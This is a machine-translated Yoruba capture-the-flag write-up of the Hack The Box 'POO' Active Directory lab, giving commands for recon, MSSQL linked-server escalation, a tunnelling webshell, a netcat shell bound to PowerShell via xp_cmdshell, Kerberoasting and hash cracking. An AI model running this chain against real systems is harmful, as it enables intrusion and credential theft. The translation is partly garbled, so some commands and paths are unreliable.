Ninu nkan yii a yoo ṣe itupalẹ aye ti kii ṣe ẹrọ nikan, ṣugbọn gbogbo yàrá-kekere lati aaye naa .
Gẹgẹbi a ti sọ ninu apejuwe, POO jẹ apẹrẹ lati ṣe idanwo awọn ọgbọn ni gbogbo awọn ipele ti awọn ikọlu ni agbegbe Active Directory kekere kan. Ibi-afẹde ni lati fi ẹnuko agbalejo wiwọle kan, mu awọn anfani pọ si, ati nikẹhin fi ẹnuko gbogbo agbegbe lakoko gbigba awọn asia 5.
Asopọ si yàrá jẹ nipasẹ VPN. A ṣe iṣeduro lati ma sopọ lati kọnputa iṣẹ tabi lati ọdọ agbalejo nibiti data wa ti o ṣe pataki si ọ, niwọn igba ti o pari lori nẹtiwọọki aladani pẹlu awọn eniyan ti o mọ ohunkan ni aaye aabo alaye :)
leto alaye
Ki o le wa jade nipa titun ìwé, software ati awọn miiran alaye, Mo ti da и ni agbegbe ti IIKB. Paapaa awọn ibeere ti ara ẹni, awọn ibeere, awọn imọran ati awọn iṣeduro .
Gbogbo alaye ti pese fun awọn idi ẹkọ nikan. Onkọwe iwe yii ko gba ojuse fun eyikeyi ibajẹ ti o ṣẹlẹ si ẹnikẹni nitori abajade lilo imọ ati awọn ọna ti o gba bi abajade ti kikọ iwe-ipamọ yii.
Intro
Eleyi endgame oriširiši meji ero, ati ki o ni 5 asia.
Apejuwe ati adirẹsi ti agbalejo to wa tun fun.
Jẹ ki a bẹrẹ!
Recon flag
Ẹrọ yii ni adiresi IP ti 10.13.38.11, eyiti mo fi kun si /etc/hosts.
10.13.38.11 poo.htb
Ni akọkọ, a ṣayẹwo awọn ibudo ṣiṣi. Niwọn igba ti ọlọjẹ gbogbo awọn ebute oko oju omi pẹlu nmap gba igba pipẹ, Emi yoo kọkọ ṣe eyi ni lilo masscan. A ṣe ayẹwo gbogbo awọn ebute TCP ati UDP lati wiwo tun0 ni iyara ti awọn apo-iwe 500 fun iṣẹju kan.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Bayi, lati gba alaye alaye diẹ sii nipa awọn iṣẹ ti o nṣiṣẹ lori awọn ebute oko oju omi, jẹ ki a ṣiṣẹ ọlọjẹ pẹlu aṣayan -A.
nmap -A poo.htb -p80,1433
Nitorinaa a ni awọn iṣẹ IIS ati MSSQL. Ni ọran yii, a yoo rii orukọ DNS gidi ti agbegbe ati kọnputa. Lori olupin oju opo wẹẹbu a ti kí nipasẹ oju-iwe ile IIS.
Jẹ ki a lọ nipasẹ awọn ilana. Mo lo gobuster fun eyi. Ninu awọn paramita a tọka nọmba awọn okun 128 (-t), URL (-u), iwe-itumọ (-w) ati awọn amugbooro ti o nifẹ si wa (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Eyi fun wa ni ìfàṣẹsí HTTP fun itọsọna/abojuto, bakanna bi iṣẹ tabili tabili ti o wa .DS_Store faili. .DS_Store jẹ awọn faili ti o tọju awọn eto aṣa fun folda kan, gẹgẹbi atokọ ti awọn faili, awọn ipo aami, ati aworan abẹlẹ ti o yan. Iru faili bẹẹ le pari ni itọsọna olupin wẹẹbu ti awọn olupilẹṣẹ wẹẹbu. Ni ọna yii a gba alaye nipa awọn akoonu inu itọsọna naa. Fun eyi o le lo .
python3 dsstore_crawler.py -i http://poo.htb/
A gba awọn akoonu ti liana. Ohun ti o nifẹ julọ nibi ni itọsọna / dev, lati eyiti a le wo awọn orisun ati awọn faili db ni awọn ẹka meji. Ṣugbọn a le lo awọn ohun kikọ 6 akọkọ ti faili ati awọn orukọ ilana ti iṣẹ naa ba jẹ ipalara si IIS ShortName. O le ṣayẹwo fun ailagbara yii nipa lilo .
Ati pe a rii faili ọrọ kan ti o bẹrẹ pẹlu “poo_co”. Lai mọ kini lati ṣe atẹle, Mo kan yan gbogbo awọn ọrọ ti o bẹrẹ pẹlu “co” lati inu iwe-itumọ itọsọna.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtAti pe a yoo yanju rẹ nipa lilo wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Ati pe a wa ọrọ ti o tọ! A wo faili yii, fipamọ awọn iwe-ẹri (dajọ nipasẹ paramita DBNAME, wọn wa lati MSSQL).
A jowo asia ati pe a ni ilosiwaju 20%.
Huh flag
A sopọ si MSSQL, Mo lo DBeaver.
A ko rii ohunkohun ti o nifẹ ninu data data yii, jẹ ki a ṣẹda Olootu SQL kan ki o ṣayẹwo kini awọn olumulo wa.
SELECT name FROM master..syslogins;
A ni meji olumulo. Jẹ ki a ṣayẹwo awọn anfani wa.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Nitorinaa, ko si awọn anfani. Jẹ ki a wo awọn olupin ti a ti sopọ, Mo kowe nipa ilana yii ni awọn alaye .
SELECT * FROM master..sysservers;
Eyi ni bii a ṣe rii olupin SQL miiran. Jẹ ki a ṣe idanwo ipaniyan ti awọn aṣẹ lori olupin yii nipa lilo ṣiṣafihan ().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Ati pe a le paapaa kọ igi ibeere kan.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');Oro naa ni pe nigba ti a ba beere ibeere kan si olupin ti o ni asopọ, ibeere naa ni a ṣe ni ipo ti olumulo miiran! Jẹ ki a wo ni ọrọ ti olumulo ti a n ṣiṣẹ lori olupin ti o sopọ.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Bayi jẹ ki a wo ni agbegbe wo ni ibeere kan ṣe lati ọdọ olupin ti o sopọ si tiwa!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Nitorina o jẹ ọrọ DBO ti o yẹ ki o ni gbogbo awọn anfani. Jẹ ki a ṣayẹwo awọn anfani ni ọran ti ibeere lati ọdọ olupin ti o ni asopọ.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Bi o ti le rii, a ni gbogbo awọn anfani! Jẹ ki a ṣẹda admin tiwa bi eleyi. Ṣugbọn wọn ko gba laaye nipasẹ ṣiṣafihan, jẹ ki a ṣe nipasẹ EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";Ati ni bayi a sopọ pẹlu awọn iwe-ẹri ti olumulo tuntun, a ṣe akiyesi data data asia tuntun.
A fi yi Flag ati ki o tẹsiwaju.
BackTrack asia
Jẹ ki a gba ikarahun kan nipa lilo MSSQL, Mo lo mssqlclient lati inu package impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
A nilo lati gba awọn ọrọ igbaniwọle, ati ohun akọkọ ti a ti pade tẹlẹ ni oju opo wẹẹbu kan. Nitorinaa, a nilo atunto olupin wẹẹbu kan (ko ṣee ṣe lati lọ kuro ni ikarahun ti o rọrun, o han gbangba pe ogiriina nṣiṣẹ).
Ṣugbọn wiwọle ti wa ni kọ. Botilẹjẹpe a le ka faili naa lati MSSQL, a kan nilo lati mọ kini awọn ede siseto ti tunto. Ati ninu itọsọna MSSQL a rii pe Python wa.
Lẹhinna ko si iṣoro kika faili web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Pẹlu awọn iwe-ẹri ti o rii, lọ si /abojuto ki o gba asia.
Asia ifẹsẹtẹ
Ni otitọ, diẹ ninu awọn airọrun wa lati lilo ogiriina, ṣugbọn wiwo nipasẹ awọn eto nẹtiwọọki, a ṣe akiyesi pe IPv6 tun lo!
Jẹ ki a ṣafikun adirẹsi yii si /etc/hosts.
dead:babe::1001 poo6.htb
Jẹ ki a ṣayẹwo ogun naa lẹẹkansi, ṣugbọn lilo ilana IPv6.
Ati pe iṣẹ WinRM wa lori IPv6. Jẹ ki a sopọ pẹlu awọn iwe-ẹri ti o rii.
Flag wa lori tabili tabili, a fi fun u.
P00ned asia
Lẹhin ti ifọnọhan reconnaissance lori ogun lilo A ko ri nkankan pataki. Lẹhinna o pinnu lati wa awọn iwe-ẹri lẹẹkansi (Mo tun kowe lori koko yii ). Ṣugbọn emi ko le gba gbogbo awọn SPN lati inu eto nipasẹ WinRM.
setspn.exe -T intranet.poo -Q */*
Jẹ ki a ṣiṣẹ aṣẹ nipasẹ MSSQL.
Lilo ọna yii, a gba SPN ti awọn olumulo p00_hr ati p00_adm, eyiti o tumọ si pe wọn jẹ ipalara si ikọlu bii Kerberoasting. Ni kukuru, a le gba awọn hashes ọrọ igbaniwọle wọn.
Ni akọkọ o nilo lati gba ikarahun iduroṣinṣin bi olumulo MSSQL kan. Ṣugbọn niwọn igba ti wiwọle wa ni opin, a ni ibaraẹnisọrọ pẹlu agbalejo nikan nipasẹ awọn ibudo 80 ati 1433. Sugbon o jẹ ṣee ṣe lati eefin ijabọ nipasẹ ibudo 80! Fun eyi a yoo lo . Jẹ ki a gbe faili tunnel.aspx si itọsọna ile ti olupin wẹẹbu - C: inetpubwwwroot.
Ṣugbọn nigba ti a ba gbiyanju lati wọle si, a gba aṣiṣe 404. Eyi tumọ si pe * .aspx awọn faili ko ṣiṣẹ. Ni ibere fun awọn faili pẹlu awọn amugbooro wọnyi lati ṣiṣẹ, fi ASP.NET 4.5 sori ẹrọ gẹgẹbi atẹle.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Ati ni bayi, nigba ti a ba wọle si tunnel.aspx, a gba esi pe ohun gbogbo ti ṣetan lati lọ.
Jẹ ki a ṣe ifilọlẹ apakan alabara ti ohun elo naa, eyiti yoo tan ijabọ. A yoo dari gbogbo awọn ijabọ lati ibudo 5432 si olupin naa.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Ati pe a lo awọn proxychains lati firanṣẹ ijabọ ohun elo eyikeyi nipasẹ aṣoju wa. Jẹ ki a ṣafikun aṣoju yii si faili iṣeto ni /etc/proxychains.conf.
Bayi jẹ ki ká po si awọn eto si olupin , pẹlu eyiti a yoo ṣe ikarahun dipọ iduroṣinṣin ati iwe afọwọkọ , pẹlu eyiti a yoo ṣe ikọlu Kerberoasting.
Bayi a ṣe ifilọlẹ olutẹtisi nipasẹ MSSQL.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Ati pe a sopọ nipasẹ aṣoju wa.
proxychains rlwrap nc poo.htb 4321
Ati jẹ ki a gba awọn hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Nigbamii o nilo lati ṣe atunwo lori awọn hashes wọnyi. Niwọn bi iwe-itumọ rockyou ko ni awọn ọrọ igbaniwọle wọnyi ninu, Mo lo GBOGBO awọn iwe-itumọ ọrọ igbaniwọle ti a pese ni Seclists. Fun wiwa a lo hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceAti pe a wa awọn ọrọ igbaniwọle mejeeji, akọkọ ninu iwe-itumọ dutch_passwordlist.txt, ati ekeji ni Keyboard-Combinations.txt.
Ati nitorinaa a ni awọn olumulo mẹta, jẹ ki a lọ si oludari agbegbe. Ni akọkọ a wa adirẹsi rẹ.
Nla, a rii adiresi IP ti oludari agbegbe naa. Jẹ ká wa jade gbogbo awọn olumulo ti awọn ìkápá, bi daradara bi ewo ni ninu wọn jẹ ẹya IT. Lati ṣe igbasilẹ iwe afọwọkọ lati gba alaye PowerView.ps1. Lẹhinna a yoo sopọ pẹlu lilo ibi-winrm, ti n ṣalaye itọsọna pẹlu iwe afọwọkọ ni paramita -s. Ati lẹhinna a yoo kan gbe iwe afọwọkọ PowerView nikan.
Bayi a ni iwọle si gbogbo awọn iṣẹ rẹ. Olumulo p00_adm dabi olumulo ti o ni anfani, nitorinaa a yoo ṣiṣẹ ni agbegbe rẹ. Jẹ ki a ṣẹda ohun PSCRedential fun olumulo yii.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassBayi gbogbo awọn pipaṣẹ Powershell nibiti a ti sọ awọn Creds yoo jẹ ṣiṣe bi p00_adm. Jẹ ki a ṣe afihan atokọ ti awọn olumulo ati abuda AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Ati nitorinaa, olumulo wa ni anfani gaan. Jẹ ki a wo awọn ẹgbẹ wo ni o wa.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Nikẹhin a jẹrisi pe olumulo jẹ oludari agbegbe kan. Eyi fun ni ẹtọ lati wọle si oluṣakoso agbegbe latọna jijin. Jẹ ki a gbiyanju lati wọle nipasẹ WinRM ni lilo oju eefin wa. Mo ni idamu nipasẹ awọn aṣiṣe ti a ṣe nipasẹ reGeorg nigba lilo ibi-winrm.
Lẹhinna jẹ ki a lo omiiran, rọrun, lati sopọ si WinRM. Jẹ ki a ṣii ati yi awọn paramita asopọ pada.
A gbiyanju lati sopọ, ati pe a wa ninu eto naa.
Sugbon ko si asia. Lẹhinna wo olumulo naa ki o ṣayẹwo awọn tabili itẹwe.
A rii asia ni mr3ks ati yàrá ti pari 100%.
Gbogbo ẹ niyẹn. Gẹgẹbi esi, jọwọ sọ asọye boya o kọ ohunkohun titun lati inu nkan yii ati boya o wulo fun ọ.
O le darapọ mọ wa ni . Nibẹ ni o le wa awọn ohun elo ti o nifẹ, awọn iṣẹ ikẹkọ ti jo, ati sọfitiwia. Jẹ ki a ṣajọ agbegbe kan ninu eyiti awọn eniyan yoo wa ti o loye ọpọlọpọ awọn agbegbe ti IT, lẹhinna a le ṣe iranlọwọ fun ara wa nigbagbogbo lori eyikeyi IT ati awọn ọran aabo alaye.
orisun: www.habr.com